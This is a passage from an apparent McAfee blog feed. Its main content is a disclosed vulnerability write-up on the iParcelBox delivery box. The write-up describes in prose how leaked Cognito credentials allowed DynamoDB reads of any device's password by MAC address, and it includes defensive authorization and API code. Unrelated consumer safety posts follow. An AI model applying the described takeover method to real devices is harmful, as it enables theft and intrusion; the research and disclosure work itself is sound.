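    f_levels, t_levels = filter_.split("/"), topic.split("/")
    for i, lvl in enumerate(f_levels):
        if lvl == "#":
            return i == len(f_levels) - 1
        if i >= len(t_levels) or (lvl != "+" and lvl != t_levels[i]):
            return False
    return len(f_levels) == len(t_levels)


def filter_covered(allowed: str, requested: str) -> bool:
    """True if every topic the client-requested filter could match is also matched by the
    allowed filter, so a subscription to '+/command/#' or '#' cannot widen a device's view."""
    a, r = allowed.split("/"), requested.split("/")
    for i, lvl in enumerate(a):
        if lvl == "#":
            return True
        if i >= len(r) or r[i] == "#":
            return False
        if lvl == "+":
            continue
        if r[i] != lvl:          # a literal allowed level also rejects a '+' request here
            return False
    return len(a) == len(r)


@dataclass
class Principal:
    name: str
    publish: List[str]      # filters describing topics this identity may publish to
    subscribe: List[str]    # filters describing subscriptions it may request


def device_principal(topic_id: str) -> Principal:
    """Derive a device's permissions from its authenticated identity (the certificate's
    topic ID), never from a value the client supplies in a message."""
    return Principal(
        name=f"device:{topic_id}",
        publish=[f"{topic_id}/shadow/update", f"{topic_id}/rpc/response"],
        subscribe=[f"{topic_id}/command/#", f"{topic_id}/rpc/request"],
    )


# The cloud control plane is the only identity allowed to address every device.
BACKEND = Principal(
    name="backend",
    publish=["+/command/#", "+/rpc/request"],
    subscribe=["+/shadow/update", "+/rpc/response"],
)


def authorize(principal: Principal, action: str, topic: str) -> bool:
    """Decide a PUBLISH (exact topic) or SUBSCRIBE (possibly wildcarded filter) request."""
    if action == "publish":
        if "+" in topic or "#" in topic:        # wildcards are invalid in a publish topic
            return False
        return any(topic_matches(f, topic) for f in principal.publish)
    if action == "subscribe":
        return any(filter_covered(f, topic) for f in principal.subscribe)
    return False


if __name__ == "__main__":
    # Two lab devices with adjacent MAC-derived topic IDs, as on the page.
    own = device_principal("30AEA4C59D30")
    checks = [
        (own, "publish", "30AEA4C59D30/shadow/update"),     # its own shadow: allowed
        (own, "subscribe", "30AEA4C59D30/command/unlock"),  # its own commands: allowed
        (own, "publish", "30AEA4C59D6C/shadow/update"),     # neighbour's topic: denied
        (own, "subscribe", "+/command/unlock"),             # every device's commands: denied
        (own, "publish", "30AEA4C59D6C/rpc/request"),       # RPC toward another device: denied
        (BACKEND, "publish", "30AEA4C59D6C/rpc/request"),   # control plane: allowed
    ]
    for p, act, t in checks:
        print(f"{p.name:22} {act:9} {t:32} -> {'allow' if authorize(p, act, t) else 'deny'}")
```

The design point is in `device_principal`: the permitted filters are built from the identity the broker authenticated, so a compromised device's certificate buys access to exactly one subtree, and incremental topic IDs stop mattering. On AWS IoT the same binding is expressed in the IoT policy attached to the certificate, using the policy variable `${iot:Connection.Thing.ThingName}` in the topic resource ARNs instead of a literal or wildcard, so that a single policy document still yields per-device scope.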

Scanning for iParcelBoxes and Controlling them with RPC

Method #2 – AWS Misconfiguration

While writing this blog we wanted to double check that SSL pinning was done properly. After we saw this post during our recon, we assumed it was pinning a certificate. We set up an Android device with a certificate unpinner using Frida. With the unpinner installed and working we were able to decrypt traffic between the application and the AWS servers, but it failed to decrypt the data from the application to the iParcelBox. Please follow this technique if you’d like to learn how you can unpin certificates on Android devices.

Next, we reran the iParcelBox application without the Frida SSL Unpinner, which returned the same AWS server transactions, meaning that pinning wasn’t enabled. We browsed through some of the captures and found some interesting requests.

Cognito Credential SSL Network Capture

The “credentials” in the capture immediately piqued our interest. They are returned by a service called “Cognito”, which is an AWS service allowing apps and users to access resources within the AWS ecosystem for short periods of time and with limited access to private resources.

AWS Cognito example (Photo Credit: Amazon.com)

When an application wants to access an AWS service, it can ask for temporary credentials for the specific task. If the permissions are configured correctly, the credentials issued by the Cognito service will allow the application or user to complete that one task and deny all other uses of the credentials to other services.

To use these credentials, we needed the AWS CLI. Thankfully, Amazon even provides a Docker image for the AWS CLI, which made things much easier for us. We just saved the credentials returned from the Cognito service inside a “~/.aws” folder. Then we checked what role these credentials were given.

AWS-CLI docker command

The credentials captured from the Android application were given the “AppAuth_Role”. To find out what the “AppAuth_Role” had access to we then ran a cloud service enumeration using the credentials; the scripts can be found here (https://github.com/NotSoSecure/cloud-service-enum) and are provided by the NotSoSecure team. The AWS script didn’t find any significant security holes and showed that the credentials were properly secured. However, looking at the next few network captures we noticed that these credentials were being used to access the DynamoDB database.

Checking if the user is subscribed to the Premium service

Getting the owner’s devices

After reading through some of the DynamoDB documentation we were able to craft database queries.

DynamoDB Query

Because the “primary key” for the database is the “DeviceID” which we know is just the MAC address of the iParcelBox, we can then modify this query and get any other device’s database entries. While we didn’t test this for ethical reasons, we suspect that we could have used this information to gain access to the MQTT services. We also did not attempt to write to the database since this was a live production database and we didn’t want to corrupt any data.

We investigated the Android application attempting to trigger some more database interactions to see what other queries were being sent, but were limited to the following:

  • Accounts – Shows premium subscription info
  • Owners – Shows devices and guests of each iParcelBox
  • Users – Used to save owners of each iParcelBox (only during setup)

With our self-imposed database write restrictions, none of these tables really helped us anyway. That is when we began looking at the disassembled code of the Android app for more clues. Since we now knew the table names, we searched for “ClientID”, which turned up the Java file “DBConstants.class.”

Constants file from APK

This constants file gave us information that there are more database tables and fields, even though we never saw them in the network traffic. The “TABLE_DEVICES_PASSWORD” caught our eyes from the “iParcelBox_devices” table.

We tested the “AppAuth_Role” credentials on this table as well, which was accepted.

Requesting information from the iParcelBox_devices table

We were able to get the device password and serial number all from the MAC address. Recall the “iParcelBox Setup Information” image at the beginning of the blog and how it mentions that you should keep this information safe. The reason that this information should be kept safe is that you can become the owner of the iParcelBox if you know the MAC address, serial number, and password even without the QR code thanks to the “Add Manually” button.

“Add manually” option during setup

With this information an attacker could register for a new iParcelBox account, login to the application, capture the Cognito credentials, begin the “setup” process, click “Add Manually” and then enter all the required information returned from the database to gain full control over any iParcelBox. This could all take place from simply knowing the MAC address since the “AppAuth_Role” can read any database entry.

Required Information to set up the iParcelBox

Lessons Learned

This project took a turn from a classic hardware/IOT device research project to an OSINT research topic very early on. It really goes to show that even simple mistakes with online data hygiene can expose key details to attackers, allowing them to narrow down attack vectors or exposing sensitive information like credentials.

Since this was a sponsored project from iParcelBox, we reported this to the company immediately. They promptly changed the admin password for every iParcelBox and asked the developers at Mongoose-OS to implement a change where one device’s AWS certificate and private key cannot control any other device. This was patched within 12 hours of our vendor disclosure, which puts iParcelBox among the fastest patch response times we have ever seen. We have tested the patch and can no longer control other devices or use the old admin password to access the devices from within setup mode.

iParcelBox also fixed the Android application not pinning certificates properly and removed all direct calls to the DynamoDB. We were still able to decrypt some traffic using the Frida SSL unpinner, but the application would freeze, which we believe is due to the MQTT broker not accepting a custom certificate. The DynamoDB queries are now wrapped in API calls which also check against the customer ID. This prevents someone from using their extracted Cognito credentials to obtain information from any device other than their own. Wrapping the database queries within API calls is an effective security fix as well, as the data can be parsed, verified, and sanitized all before committing to the database.
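The API-layer fix described above, as an added example rather than iParcelBox’s own code: a request handler that takes the caller’s identity from the signed request, checks an ownership table before reading the per-device table, validates the DeviceID as a MAC address, and never returns the device password. The in-memory dictionaries stand in for the DynamoDB tables named in the post; the field names other than DeviceID, the identity ids, the sample records and the API Gateway proxy-event layout are assumptions.

```python
"""Ownership-checked lookup in front of a per-device table.

Added example: the dictionaries are in-memory stand-ins for the DynamoDB tables
named in the post; field names other than DeviceID, identity ids and records are
constructed sample data.
"""
import json
import re
from typing import Dict, Set

MAC_RE = re.compile(r"^[0-9A-F]{12}$")

# Owners table: Cognito identity id -> DeviceIDs registered to that account (constructed)
OWNERS: Dict[str, Set[str]] = {
    "us-east-1:owner-alice": {"AABBCCDDEE01"},
    "us-east-1:owner-bob": {"AABBCCDDEE02"},
}

# Devices table keyed by DeviceID, i.e. the device MAC address (constructed)
DEVICES: Dict[str, Dict[str, str]] = {
    "AABBCCDDEE01": {"DeviceID": "AABBCCDDEE01", "serial": "SN-SAMPLE-0001", "password": "sample-pw-1"},
    "AABBCCDDEE02": {"DeviceID": "AABBCCDDEE02", "serial": "SN-SAMPLE-0002", "password": "sample-pw-2"},
}

# Fields the app legitimately needs; the device password is never returned.
PUBLIC_FIELDS = ("DeviceID", "serial")


class BadRequest(Exception):
    """Malformed input from the client."""


class Forbidden(Exception):
    """Caller is not the registered owner of the device."""


def normalize_device_id(raw: str) -> str:
    """Accept common MAC spellings, reject anything that is not 12 hex digits."""
    mac = raw.strip().replace(":", "").replace("-", "").upper()
    if not MAC_RE.fullmatch(mac):
        raise BadRequest("DeviceID must be a 12-hex-digit MAC address")
    return mac


def get_device_for_caller(identity_id: str, raw_device_id: str) -> Dict[str, str]:
    """Return the caller's own device record, minus secrets.

    The ownership check runs before the device table is read, so Cognito
    credentials alone do not let a caller walk other people's devices by MAC.
    """
    device_id = normalize_device_id(raw_device_id)
    if device_id not in OWNERS.get(identity_id, set()):
        # Same error whether the device belongs to someone else or does not exist,
        # so the endpoint cannot be used to confirm which MACs are registered.
        raise Forbidden("device is not registered to this account")
    record = DEVICES.get(device_id)
    if record is None:
        raise Forbidden("device is not registered to this account")
    return {k: record[k] for k in PUBLIC_FIELDS}


def handle_request(event: Dict) -> Dict:
    """Lambda-style handler. The event layout follows API Gateway's Lambda proxy
    format for an IAM-authorised call (assumption); the identity comes from the
    signed request, never from a client-supplied parameter."""
    identity = event.get("requestContext", {}).get("identity", {}).get("cognitoIdentityId")
    if not identity:
        return {"statusCode": 401, "body": "unauthenticated"}
    params = event.get("queryStringParameters") or {}
    try:
        device = get_device_for_caller(identity, params.get("deviceId", ""))
    except BadRequest as exc:
        return {"statusCode": 400, "body": str(exc)}
    except Forbidden as exc:
        return {"statusCode": 403, "body": str(exc)}
    return {"statusCode": 200, "body": json.dumps(device)}
```

The design choice worth noting is that the password column is not in the response at all: the legitimate owner already holds it on the setup card, so the backend has no reason to ever send it over the wire, and a future bug in the ownership check cannot leak what the API never returns.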

We wanted to give props to the team at iParcelBox for their focus on security throughout the development of this product. It is easy to see from the device and the forum posts that the developers have been trying to make this device secure from the start and have done it well. All non-essential features like UART and Bluetooth are turned off by default, and a focus on data protection is clearly there, as evidenced through the use of SSL and encryption of the flash memory. There are not many attack surfaces that an attacker could leverage on the device, and it is refreshing to see IOT devices heading in this direction.

What’s in the Box? Part II: Hacking the iParcelBox https://www.mcafee.com/blogs/other-blogs/mcafee-labs/whats-in-the-box-part-ii-hacking-the-iparcelbox/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/whats-in-the-box-part-ii-hacking-the-iparcelbox/#respond Thu, 18 Jun 2020 07:01:40 +0000 /blogs/?p=101920

Package delivery is just one of those things we take for granted these days. This is especially true in the age of Coronavirus, where e-commerce and at-home deliveries make up a growing portion of consumer buying habits.

In 2019, McAfee Advanced Threat Research (ATR) conducted a vulnerability research project on a secure home package delivery product, known as BoxLock. The corresponding blog can be found here and highlights a vulnerability we found in the Bluetooth Low Energy (BLE) configuration used by the device. Ultimately, the flaw allowed us to unlock any BoxLock in Bluetooth range with a standard app from the Apple or Google store.

Shortly after we released this blog, a similar product company based in the UK reached out to the primary researcher (Sam Quinn) here at McAfee ATR, requesting that the team perform research analysis on his product, called the iParcelBox. This device is comprised of a secure steel container with a push-button on the outside, allowing for package couriers to request access to the delivery container with a simple button press, notifying the homeowner via the app and allowing remote open/close functions.

iParcelBox – Secure Package Delivery & iParcelBox App

The researcher was able to take a unique spin on this project by performing OSINT (Open Source Intelligence), which is the practice of using publicly available information, often unintentionally publicized, to compromise a device, system or user. In this case, the primary developer for the product wasn’t practicing secure data hygiene for his online posts, which allowed the researcher to discover information that dramatically shortened what would have been a much more complicated project. He discovered administrative credentials and corresponding internal design and configurations, effectively providing the team access to any and all iParcelBox devices worldwide, including the ability to unlock any device at a whim. All test cases were executed on lab devices owned by the team or approved by iParcelBox. Further details of the entire research process can be found in the full technical version of the research blog here.

The actual internals of the system were well-designed from a security perspective, utilizing concepts like SSL for encryption, disabling hardware debugging, and performing proper authentication checks. Unfortunately, this level of design and security was all undermined by the simple fact that credentials were not properly protected online. Armed with these credentials, the researcher was able to extract sensitive certificates, keys, device passwords, and WIFI passwords off any iParcelBox.

Secondly, as the researcher prepared the writeup on the OSINT techniques used for this, he made a further discovery. When analyzing the configuration used by the Android app to interact with the cloud-based IOT framework (AWS-IOT), he found that even without an administrative password, he could leak plaintext temporary credentials to query the AWS database. These credentials had a permission misconfiguration which allowed the researcher to query all the information about any iParcelBox device and to become the primary owner.

In both cases, to target a device, an attacker would need to know the MAC address of the victim’s iParcelBox; however, the iParcelBox MAC addresses appeared to be generated non-randomly and were simple to guess.

A typical research effort for McAfee ATR involves complex hardware analysis, reverse engineering, exploit development and much more. While the developer made some high-level mistakes regarding configuration and data hygiene, we want to take a moment to recognize the level of effort put into both physical and digital security. iParcelBox implemented numerous security concepts that are uncommon for IOT devices and significantly raise the bar for attackers. It’s much easier to fix issues like leaked passwords or basic configuration issues than to rebuild hardware or reprogram software to bolt on security after the fact. This may be why the company was able to fix both issues almost immediately after we informed them in March of 2020. We’re thrilled to see more and more companies of all sizes embracing the security research community and collaborating quickly to improve their products, even from the beginning of the development cycle.

What can be done?

For consumers:

Even developers are subject to the same issues we all have: choosing secure and complex passwords, protecting important credentials, practicing security hygiene, and choosing secure configurations when implementing controls for a device. As always, we encourage you to evaluate the vendor’s approach to security. Do they embrace and encourage vulnerability research on their products? How quick are they to implement fixes, and are they done correctly? Nearly every product on the market will have security flaws if you look hard enough, but the way they are handled is arguably more important than the flaws themselves.

For developers and vendors:

This case study should provide a valuable testament to the power of community. Don’t be afraid to engage security researchers and embrace the discovery of vulnerabilities. The more critical the finding, the better! Work with researchers or research companies that practice responsible disclosure, such as McAfee ATR. Additionally, it can be easy to overlook the simple things such as the unintentional leak of critical data found during this project. A security checklist should include both complex and simple steps to ensure the product maintains proper security controls and essential data is protected and periodically audited.

Internet Privacy: Tips & Tricks for Staying Secure Online https://www.mcafee.com/blogs/consumer/internet-privacy-tips-tricks-for-staying-secure-online/ https://www.mcafee.com/blogs/consumer/internet-privacy-tips-tricks-for-staying-secure-online/#comments Tue, 16 Jun 2020 16:48:55 +0000 /blogs/?p=101977 Working from home

Working from home

How much value do you place on your personal privacy? You would never leave your wallet on a public park bench and expect it to be safe and untouched. It is possible that no one would take your valuable belongings, but you’d never intentionally take the risk – so why would you risk your personal data online?

The Power of Privacy

No matter who you are, you need to protect what’s yours. The fact is that your online data can’t be replaced the same way that your tangible possessions can be, and privacy has an intrinsic value that can be easily compromised on the web.

So how can you keep yourself and your sensitive information safe online? To learn more about safety while browsing the web, read on.

What is a Virtual Private Network?

A VPN, or virtual private network, routes your internet usage exclusively through private channels. Doing this effectively blocks your web activity from prying eyes and subsequently protects your sensitive data. When using public Wi-Fi hotspots, a VPN hides your identity and location, preserving your privacy and offering you peace of mind.

What Can A VPN Do For You?

In this fast-paced, high-tech world, a VPN is an invaluable asset. While your internet service provider (ISP) can’t read your online interactions, it’s nevertheless capable of identifying communication links. For example, it can trace the connections from your computer to sensitive web addresses like your bank or brokerage firm. Knowing that your vulnerable information is floating around on the internet might be enough to entice an unscrupulous ISP into finding and using it for their own benefit.

If you’re not using public internet services or doing your computing from home, you might be wondering if you need a VPN at all. Not necessarily, but at McAfee, we believe it always pays to take precautions.

Are Your Passwords Protecting You?

We often feel secure relying on passwords to protect our privacy. The unfortunate truth is that a password alone may not be enough to deter a hacker. If you notice unusual behavior on your computer, it could mean that a hacker already knows your password.

We need passwords to get almost anywhere on the internet, but the familiarity of this practice may result in complacency. After a while, a password may seem unimportant or even burdensome. Instead of trying to remember countless complicated passwords, you might feel overly comfortable in resorting to simpler passwords that are easily breakable with even the smallest effort.

How To Strengthen Your Passwords

A secure password requires at least 14 characters and should include upper- and lower-case letters, numbers, and symbols.

If your password consists of readily available public knowledge like your birthdate, street address, or your dog’s name, chances are it’s not very strong. Likewise, predictable sequences of numbers or letters, like 123456789 or abcdefg, are risky.

Should You Protect Yourself From Viruses?

You wouldn’t cross the street without looking both ways. Installing antivirus software is the virtual equivalent of double-checking on a busy street. Protect your computer’s health and safety with antivirus software that prevents attacks from malicious programs that can infect your computer and the computers of others.

The Antivirus Safety Net

Every time you access the internet, you risk infection from a vast array of malware, including trojan horses, worms, and spyware, to name just a few. Luckily, antivirus software has a firewall that can detect these intruders, while a recovery tool helps eliminate these malicious programs from your computer.

Both a firewall and a VPN can prevent unauthorized web access to your computer systems. McAfee offers both antivirus software that removes malware, spyware, and adware through scheduled scans, and a VPN, Safe Connect, that protects your computer in real time.

Should You Update Your Software?

You’re likely already familiar with many of the best privacy practices. These include using secure passwords, rejecting unknown emails, ignoring suspicious-looking links, and never distributing your personal information. When you pair these practices with free updates to your security software, you’re in an excellent position to preserve your privacy on the web.

Software updates can rectify security issues, replace outdated features, enhance compatibility with your apps, and even increase running speed. These patches can protect your computer from viruses, and prevent spread to other systems.

How To Update

Ready to update? Simply click ‘yes’ when you get a popup from your software developer asking if you’d like the latest features.

Most manufacturers offer free updates, while others require a technical support contract. Each software manufacturer’s website should provide specific details to help you download their security updates.

What are Cookies? Should I remove them?

Removing cookies is really up to preference. Cookies allow a website you’ve visited to retain your information—like your email address and password—for a more convenient user experience. However, tracking cookies do pose a risk to your security. By allowing cookies, you’re saying it’s okay for the information to be sent to an unknown location.

Many cookies are relatively harmless and do nothing more than use your IP address for marketing analysis. Others, however, may submit your name and address to a tracking host, allowing advertisers to target you with bullseye-like precision.

Every browser has an option that lets you delete your cookies from your computer. For example, Internet Explorer shows a gear icon in the upper right-hand corner of the browser screen. You simply click on the gear, select “Internet Options” in the menu box, and then click “Delete browsing on exit.”

Connecting Securely Online

Yes, it is possible. When using an online browser, the Hypertext Transfer Protocol (HTTP) allows you to view webpages but doesn’t provide security. The lack of encryption enables third parties to easily intercept data that you may prefer to keep private. When you use Hypertext Transfer Protocol Secure (HTTPS), you enjoy secure transmissions. Not all websites support this function, but it can provide more web privacy when you visit sites that do.

Steps To Protect

So how can you use this information to keep your sensitive data from becoming vulnerable? Here are the main takeaways:
• Get a VPN. Secure your home and travel networks with VPN software. It makes blocking suspicious activity easy and can protect your computer from becoming damaged.
• Use a password manager. This is a great tool for creating and storing hard-to-break passwords. You can find free password managers online, coupled with antivirus software.
• Install antivirus and firewall software that doesn’t flag false detections.
• Accept free security updates from your software manufacturer.
• Remove cookies from your browser.
• Use HTTPS for encrypted security on sites that support it.

With a little security know-how and the right tools for the job, you’ll be well-equipped to protect even your most sensitive and valuable data. Don’t live in fear of hackers and malware. Let your software manufacturer be your safety net, and browse with peace of mind!

Beware When You Search for These TV Shows and Movies https://www.mcafee.com/blogs/consumer/au-beware-when-you-search-for-these-tv-shows-and-movies/ https://www.mcafee.com/blogs/consumer/au-beware-when-you-search-for-these-tv-shows-and-movies/#comments Tue, 16 Jun 2020 04:04:50 +0000 /blogs/?p=101911

Beware When You Search for These TV Shows and Movies

If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time.

But having multiple streaming subscriptions can quickly add up. Consequently, users who are hesitant to pay more for online streaming subscriptions

Criminals are often behind these websites, luring unsuspecting users into schemes via “free” downloads of popular movies and TV shows. Some of these movies and shows are riskier than others, however, as McAfee WebAdvisor data has revealed* that certain titles are tied to potential malware and phishing threats.

Let’s take a look at the TV shows and movies that could lead you to a dangerous download instead of your next film spree, as well as discuss what users can do to stay secure.

Top 10 Australian TV and Movie Titles

Top 10 Australian TV Titles With Risky Results
1. Unorthodox
2. You
3. Family Guy
4. Big Mouth
5. Homeland
6. The Vampire Diaries
7. Dynasty
8. Lost
9. Brooklyn Nine-Nine
10. Stranger Things

Top 10 Australian Movie Titles With Risky Results
1. Ace Ventura
2. Green Book
3. John Wick
4. The Machinist
5. Annihilation
6. Ex Machina
7. A Star Is Born
8. Fyre
9. Lady Macbeth
10. Bird Box

Stay Protected While Streaming

While consumers search for new content from home, criminals are clearly searching for ways to trick eager TV and movie fans. However, there’s still a way users can stay both entertained and secure during this time. Follow these tips to help ensure that your online entertainment experience is safe:

Watch what you click

Users looking to catch up on Season 2 of “You” or watch the “The Incredibles” on repeat should be cautious and only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from credible websites, instead of downloading a “free” version from a website that could contain malware.

Refrain from using illegal streaming sites

Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.

Use a comprehensive security solution

Use a solution like McAfee Total Protection. This can help protect your devices from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites. Additionally, McAfee WebAdvisor can be accessed as a free download.

Use parental control software

Kids are tech-savvy and may search for movies by themselves. Ensure that limits are set on your child’s device and use software that can help minimize exposure to potentially malicious or inappropriate websites.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

*Methodology: McAfee pulled the most popular TV and movie titles available on Australian streaming sites according to “best of” articles by a range of Australian publications. The web results for the searches of the entertainment titles with modifying terms, such as “TV show” and “torrent,” were then analyzed. Other popular modifying search terms include “free download,” “free login,” “free,” and “pirated download.” From there, the resulting URLs and domains were measured using McAfee WebAdvisor data and assigned a score of high, medium, or unverified risk. The results identified the top 10 TV shows and movie titles with the highest risk of being used by criminals to spread malware and phishing threats.

McAfee Team Members Give Back During Pandemic by 3D Printing PPE https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafee-team-members-give-back-during-pandemic-by-3d-printing-ppe/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafee-team-members-give-back-during-pandemic-by-3d-printing-ppe/#respond Mon, 15 Jun 2020 15:26:20 +0000 /blogs/?p=102007

Behind the scenes, McAfee secures critical information to protect what matters most. But a visible side of the company is making just as big of an impact by protecting essential workers during the pandemic.

A small army of McAfee volunteers have joined the worldwide effort to protect doctors, hospital workers and other medical professionals by making personal protective equipment (PPE). Team members are spending their downtime creating masks, visors and plastic face shields on their 3D printing machines. PPE is being generously donated, with McAfee’s support, to healthcare workers and others on the front lines of COVID-19.

Through McAfee’s corporate social responsibility response to COVID-19, global team members who are part of the 3D mask printing program have produced nearly 5,000 pieces of PPE and have used 250 volunteer hours to make a difference in our communities. Several team members have gone above and beyond the call of duty.

Many McAfee team members have joined the initiative since Advanced Threat Researcher Thomas Roccia began giving back during COVID-19 by printing masks.

McAfee has embraced this charitable spirit and display of innovation by funding the plastic filament and other materials for team members who have the hardware to produce face masks and shields. Time spent producing PPE qualifies for the company’s Volunteer Time Off program, a benefit that encourages team members to give back to the cause of their choice.

Making PPE to Protect in the Pandemic

3D printing technology has advanced significantly in recent years. On a large scale, it’s reducing production costs, increasing supply chain efficiency and providing low-cost manufacturing for unique items. Small 3D printing systems are easy to come by and getting started requires only a few hundred dollars.

For the past couple of years, Thomas has dabbled in 3D printing technology to aid his research at McAfee by building prototypes for projects.  His machine also comes in handy for fixing things that get broken at his home in France.

Thomas began producing masks and shields in March 2020 as the pandemic gained traction and has since delivered more than 1,000 within his community. Steve, who heads the Advanced Threat Research group, was so moved that he and team members Sam and Kevin crafted a plan and joined the effort.

Steve reached out to at least a dozen medical facilities in the Portland area to gauge interest, and many were on board. The group settled on a local healthcare organization in fast need of 100 masks.

McAfee donated materials for the group and production began. Averaging about a dozen masks per day, the trio soon had nearly 50 masks ready to ship. Another half dozen went to a healthcare facility in San Diego at the request of a McAfee team member.

PPE was produced with an Ender 3 Printer using a Face Shield 3D Printer Design, transparent face shield material, elastic bands, a hole punch and scissors. Getting into production, however, was the hard part, Steve said.

“We ran into some significant challenges procuring materials,” he said. “But in the end, we were able to build a pretty high-quality mask at a low cost.”

The group continues to produce PPE based on the needs of healthcare providers.

Getting the Job Done for Everyone

Another McAfee team member, Moe, comes from a family of health care providers. His dad is a doctor in Palestine and his mother is a retired personal support worker.

Moe has seen firsthand the risk, care and compassion that healthcare workers put into their career, so he began making visors and ear pieces for providers on the front lines. In one weekend, he donated about 100 visors and a plethora of ear guards to Michael Garron Hospital in Toronto.

“While I may not be in the medical field myself, it does not mean I cannot practice my talent and hobby to help our healthcare workers and my fellow Canadians during this time of need,” Moe said.

Will, a program manager at McAfee and U.S. Army veteran, also fired up his 3D printer and began making plastic masks with filtered breathing holes to protect workers on the front lines. He has gladly traded some leisure time so he can contribute to this unified giving effort.

“I wanted to help, and I have the ability to make sure essential personnel is protected and staying safe by providing PPE to them for free,” he said. “We can’t do our jobs unless they can do theirs.”

At McAfee, we encourage and support the efforts of our team members to make a difference in their communities. If you’re interested in joining the McAfee team, explore our careers.

The post McAfee Team Members Give Back During Pandemic by 3D Printing PPE appeared first on McAfee Blogs.

Beware When You Search for These TV Shows and Movies https://www.mcafee.com/blogs/consumer/india-beware-when-you-search-for-these-tv-shows-and-movies/ Sun, 14 Jun 2020 04:02:39 +0000 /blogs/?p=101898


Beware When You Search for These TV Shows and Movies

If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time.

But having multiple streaming subscriptions can quickly add up. Consequently, users who are hesitant to pay more for online streaming subscriptions

Criminals are often behind these websites, luring unsuspecting users into schemes via “free” downloads of popular movies and TV shows. Some of these movies and shows are riskier than others, however, as McAfee WebAdvisor data has revealed* that certain titles are tied to potential malware and phishing threats.

Let’s take a look at the TV shows and movies that could lead you to a dangerous download instead of your next film spree, as well as discuss what users can do to stay secure.

Top 10 Indian TV Titles With Risky Results      Top 10 Movie Titles With Risky Results
1.  Delhi Crime                                 1.  Mardaani 2
2.  Brooklyn Nine-Nine                          2.  Zootopia
3.  Panchayat                                   3.  Jawaani Jaaneman
4.  Akoori                                      4.  Chapaak
5.  Fauda                                       5.  Love Aaj Kal
6.  Ghoul                                       6.  Inception
7.  Mindhunter                                  7.  Bahubali
8.  Narcos                                      8.  Rajnigandha
9.  Devlok                                      9.  Gully Boy
10. Lost                                        10. Bala

Stay Protected While Streaming

While consumers search for new content from home, criminals are clearly searching for ways to trick eager TV and movie fans. However, there’s still a way users can stay both entertained and secure during this time. Follow these tips to help ensure that your online entertainment experience is safe:

Watch what you click

Users looking to catch up on Season 2 of “You” or watch the “The Incredibles” on repeat should be cautious and only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from credible websites, instead of downloading a “free” version from a website that could contain malware.

Refrain from using illegal streaming sites

Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.

Use a comprehensive security solution

Use a solution like McAfee Total Protection. This can help protect your devices from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users to malicious websites. Additionally, McAfee WebAdvisor can be accessed as a free download.

Use parental control software

Kids are tech-savvy and may search for movies by themselves. Ensure that limits are set on your child’s device and use software that can help minimize exposure to potentially malicious or inappropriate websites.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


*Methodology: McAfee pulled the most popular TV and movie titles available on Asian streaming sites according to “best of” articles by a range of Asian publications. The web results for the searches of the entertainment titles with modifying terms, such as “TV show” and “torrent,” were then analyzed. Other popular modifying search terms include “free download,” “free login,” “free,” and “pirated download.” From there, the resulting URLs and domains were measured using McAfee WebAdvisor data and assigned a score of high, medium, or unverified risk. The results identified the top 10 TV shows and movie titles with the highest risk of being used by criminals to spread malware and phishing threats.

Reports of Online Predators on the Rise. How to Keep Your Kids Safe. https://www.mcafee.com/blogs/consumer/family-safety/reports-of-online-predator-on-the-rise-how-to-keep-your-kids-safe/ Sat, 13 Jun 2020 16:00:30 +0000 /blogs/?p=101624

June is Internet Safety Month. And, with kids spending more time online, stepping up the public conversation about digital risks couldn’t come at a better time.

The past few months have created what some experts call the perfect storm for online predators. Schools are closed, kids are on devices more, and social distancing is creating new levels of isolation and boredom.

Guards are down, and predators know it. In fact, according to The National Center for Missing & Exploited Children (NCMEC), reports to their CyberTipline spiked 106% during the first months of the pandemic. A recent CNN story claims the dark web has seen a similar increase in activity within predator communities that has spilled over to the mainstream web since the pandemic began.

While specific data doesn’t exist (yet) to connect increased complaints directly to the ongoing health crisis, NCMEC, the FBI, and UNICEF continue to issue strong warnings to parents to step up digital safety as predators step up their efforts to connect with kids online.

What You Should Know
Predators reach out to minors through social networks, gaming platforms, or apps. They often pose as a peer, use fake photos, and create fake profiles to lure minors to chat. Predators build trust with children through devious tactics such as grooming, mirroring, and fishing, which you can read more about in our post specific to predator behavior.

Predators have been known to (although not exclusively) target socially awkward or shy kids and convince them to keep the online relationship secret. The predator may ask for a risqué or explicit photo that they may later use to bully or manipulate the child or share within predator circles on the dark web. If the child refuses to send more photos when asked, a predator may threaten to share the photos they already have with the child’s family and friends. Often the predator may ask the child to meet in person. These relationships can be brief or ongoing. Regardless of duration, each encounter can have a harmful psychological impact on a child. Of course, the worst-case predator situations can result in trafficking or death.

What You Can Do

No parent wants to think about their child in this chilling situation. However, a quick Google search regarding actual predator cases may likely inspire you to adopt targeted safety practices. Here are some focused things you can do to minimize your child’s exposure to predators.

  • Have frequent and honest conversations with your child about the specific ways predators may try to befriend them online.
  • Be a safe haven. Discuss with your kids why it’s important for them to tell you right away if they feel uncomfortable with a conversation or if they are asked to engage in any inappropriate activity online.
  • Review your child’s online profiles often. This includes the content they post, who they follow, and the “friends” who comment or message them.
  • Inventory social networks and apps to ensure privacy settings are set to the most restrictive levels possible.
  • Discuss the consequences of sharing inappropriate photos with anyone online.
  • Check in with your child frequently throughout the day. If you work at home and get easily engrossed with work, consider setting a timer to remind you to monitor your child’s digital activity.
  • Ask simple, critical questions: What apps do you use? What are you watching? Who are you talking to?
